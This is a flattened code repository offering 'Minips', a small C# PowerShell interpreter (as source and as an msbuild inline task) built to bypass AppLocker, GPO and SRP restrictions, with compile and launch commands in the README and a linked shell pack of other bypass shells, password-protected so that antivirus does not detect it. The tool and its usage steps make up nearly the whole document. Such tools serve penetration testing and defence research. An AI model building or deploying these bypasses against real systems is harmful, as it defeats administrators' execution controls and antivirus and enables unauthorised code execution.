├── LICENSE ├── README.md ├── minips ├── minips.cs └── minips.xml └── shell-pack.zip /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 InfosecMatter 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Shells for restricted environments 2 | 3 | https://www.infosecmatter.com/19-ways-to-bypass-software-restrictions-and-spawn-a-shell/ 4 | 5 | ## Minips 6 | 7 | Minips is a custom minimalist PowerShell interpreter to bypass AppLocker restrictions, GPO or SRP restrictions preventing from running powershell.exe. There are 2 identical versions available: 8 | 9 | ### minips.cs 10 | 11 | Compile with csc.exe like this: 12 | ``` 13 | # Go to the latest .NET version folder, e.g.: 14 | cd C:\Windows\Microsoft.NET\Framework64\v4.0.30319 15 | 16 | # Compile: 17 | csc.exe /unsafe /reference:"C:\path\to\System.Management.Automation.dll" /out:C:\users\public\minips.exe /platform:x64 "C:\path\to\minips.cs" 18 | ``` 19 | Then run the produced minips.exe executable to spawn the shell. 20 | 21 | ### minips.xml 22 | 23 | Simply start with msbuild.exe like this: 24 | ``` 25 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe c:\path\to\minips.xml 26 | ``` 27 | 28 | ## shell-pack.zip 29 | 30 | Contains compiled and ready to use shells for bypassing AppLocker, GPO or SRP restrictions preventing from running Command Prompt (cmd.exe) or PowerShell interpreter (powershell.exe). 31 | 32 | The pack contains the following shells: 33 | * [cmd-dll](https://blog.didierstevens.com/2010/02/04/cmd-dll/) 34 | * [CScriptShell](https://github.com/carnal0wnage/CScriptShell) 35 | * Minips 36 | * [MSBuildShell](https://github.com/Cn33liz/MSBuildShell) 37 | * [NoPowerShell](https://github.com/bitsadmin/nopowershell) 38 | * [nps](https://github.com/Ben0xA/nps) 39 | * [p0wnedshell](https://github.com/Cn33liz/p0wnedShell) 40 | * [PowerLine](https://github.com/fullmetalcache/PowerLine) 41 | * [PowerOPS](https://github.com/fdiskyou/PowerOPS) 42 | * [PowerShdll](https://github.com/p3nt4/PowerShdll) 43 | * [PSShell](https://github.com/fdiskyou/PSShell) 44 | * [SharpPick](https://github.com/TheKevinWang/SharpPick) 45 | 46 | The archive is password protected in order to evade antivirus detection. 47 | 48 | More information including the password can be found [here](https://www.infosecmatter.com/19-ways-to-bypass-software-restrictions-and-spawn-a-shell/#bonus). 49 | -------------------------------------------------------------------------------- /minips/minips.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Collections.ObjectModel; 4 | using System.Management.Automation; 5 | using System.Management.Automation.Runspaces; 6 | using System.Text.RegularExpressions; 7 | using System.Text; 8 | 9 | public class ClassExample { 10 | static int Main(string[] args) { 11 | while(true) { 12 | Console.Write("PS> "); 13 | string x = Console.ReadLine(); 14 | try { 15 | Console.WriteLine(pscmd(x)); 16 | } 17 | catch (Exception e) { 18 | Console.WriteLine(e.Message); 19 | } 20 | if (x=="exit") { 21 | return(0); 22 | } else if (x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase) >= 0) { 23 | string dir = x.Substring(x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase)+3); 24 | dir = dir.Replace("\"", string.Empty).Trim(); 25 | try { 26 | Directory.SetCurrentDirectory(dir); 27 | } 28 | catch (Exception e) { 29 | Console.WriteLine( "The specified directory does not exist. {0}", e ); 30 | } 31 | } 32 | } 33 | } 34 | public static string pscmd(string cmd) { 35 | Runspace r = RunspaceFactory.CreateRunspace(); 36 | r.Open(); 37 | RunspaceInvoke s = new RunspaceInvoke(r); 38 | s.Invoke("Set-ExecutionPolicy Unrestricted -Scope CurrentUser"); 39 | Pipeline p = r.CreatePipeline(); 40 | p.Commands.AddScript(cmd); 41 | p.Commands.Add("Out-String"); 42 | Collection results = p.Invoke(); 43 | r.Close(); 44 | StringBuilder sb = new StringBuilder(); 45 | foreach (PSObject obj in results) { 46 | sb.Append(obj); 47 | } 48 | return sb.ToString().Trim(); 49 | } 50 | public static void RunPSFile(string script) { 51 | PowerShell ps = PowerShell.Create(); 52 | ps.AddScript(script).Invoke(); 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /minips/minips.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 12 | 13 | 14 | 15 | "); 30 | string x = Console.ReadLine(); 31 | try { 32 | Console.WriteLine(pscmd(x)); 33 | } 34 | catch (Exception e) { 35 | Console.WriteLine(e.Message); 36 | } 37 | if (x=="exit") { 38 | return true; 39 | } else if (x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase) >= 0) { 40 | string dir = x.Substring(x.IndexOf("cd ", StringComparison.OrdinalIgnoreCase)+3); 41 | dir = dir.Replace("\"", string.Empty).Trim(); 42 | try { 43 | Directory.SetCurrentDirectory(dir); 44 | } 45 | catch (Exception e) { 46 | Console.WriteLine( "The specified directory does not exist. {0}", e ); 47 | } 48 | } 49 | } 50 | } 51 | public static string pscmd(string cmd) { 52 | Runspace r = RunspaceFactory.CreateRunspace(); 53 | r.Open(); 54 | RunspaceInvoke s = new RunspaceInvoke(r); 55 | s.Invoke("Set-ExecutionPolicy Unrestricted -Scope CurrentUser"); 56 | Pipeline p = r.CreatePipeline(); 57 | p.Commands.AddScript(cmd); 58 | p.Commands.Add("Out-String"); 59 | Collection results = p.Invoke(); 60 | r.Close(); 61 | StringBuilder sb = new StringBuilder(); 62 | foreach (PSObject obj in results) { 63 | sb.Append(obj); 64 | } 65 | return sb.ToString().Trim(); 66 | } 67 | public static void RunPSFile(string script) { 68 | PowerShell ps = PowerShell.Create(); 69 | ps.AddScript(script).Invoke(); 70 | } 71 | } 72 | ]]> 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /shell-pack.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/InfosecMatter/Shells-for-restricted-environments/2110dcf3ad266e5acdfe5596ece5e3ef048da2c1/shell-pack.zip --------------------------------------------------------------------------------